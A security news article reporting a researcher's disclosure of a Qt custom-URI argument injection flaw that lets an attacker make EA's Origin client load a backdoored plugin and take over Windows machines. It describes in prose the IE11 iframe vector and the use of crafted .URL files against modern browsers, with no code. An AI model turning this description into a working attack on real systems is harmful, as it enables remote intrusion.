Qt framework exploited to take full control of Windows devices

EA’s Origin gaming client can be exploited to allow an attacker to take complete control of Windows devices.

In a technical blog post published earlier this week, independent security researcher @zer0pwn demonstrated how a URI argument injection flaw in Qt – the open source GUI toolkit behind Origin – could be leveraged to force the gaming client to load a backdoored plugin.

The technique employed by the 21-year-old is partly based on previous research, and once again highlights the dangers of poorly implemented custom URI schemes.

“ZDI wrote about this technique at the beginning of April, and listed a couple CVEs to go along with it,” the researcher told The Daily Swig.

“The issue presents itself when the Qt application registers a custom URI handler and doesn’t have any checks for special characters/argument injection.”

In developing his proof of concept, zer0pwn used a Windows 8 box running Internet Explorer 11.

Here, a specially crafted URI is launched via an iframe, meaning victims simply need to be fooled into clicking on a malicious link for an attacker to gain remote code execution (RCE) and take full control of their device.

Shortcuts to success

Modern browsers offer security mitigations in the form of URI argument sanitization, and so the main takeaway here (as ever) would be for Windows users to avoid the aging IE browser.

Delving deeper into the vulnerability, however, zer0pwn demonstrated how the exploit can also be used to compromise machines running other browsers – although this would entail some social engineering.

“Exploiting this issue on an updated Windows 10 [machine] would be trivial,” he explains. “The underlying issue remains; however, the delivery of the payload is where things get complicated.

“Modern browsers encode special characters when a link is clicked, which defeats the argument injection. You can use .URL files to use special characters in a specially crafted URI, however this would require a user to actually open a .URL file from the internet.

He added: “Most browsers don’t consider .URL files dangerous. For example, Edge will smart-scan it, the file will pass the scan, and the process will then be launched with the injected arguments.

“If you were to convince someone to open a specially crafted .URL file, you could leverage code execution and infect someone via the custom URI scheme Origin has implemented.”

Take two

Zer0pwn used Origin as his “crash test dummy” for this exploit, but the researcher said the flaw is likely to impact other apps making use of the Qt GUI framework.

“Because the Qt framework allows command-line options to preload (remote) plugins, this technique can be applied to any application that was built using Qt,” he said.

“Microsoft may want to address [the way it handles .URL files], as it could be used to leverage argument injection in any application, not just Origin.”

According to the researcher, EA is currently working on a fix, although at the time of writing Origin users are still vulnerable.

“This issue was originally reported a month ago,” said zer0pwn. “I requested an update on the issue with no response, however merely hours after publishing the vulnerability they replied and assured me they were working on a fix.”

News of the RCE loophole comes a month after security researchers provided details of another, unrelated bug in the Origin desktop client that left millions of Windows PC gamers vulnerable to being hacked.

This earlier flaw was patched before the researchers went public with their findings. However, apparently frustrated with EA’s tardy response, zer0pwn has released a bypass for this first exploit, as well.

The Daily Swig has reached out to EA for comment.

RELATED XSS slip-up exposed Fortnite gamers to account hijack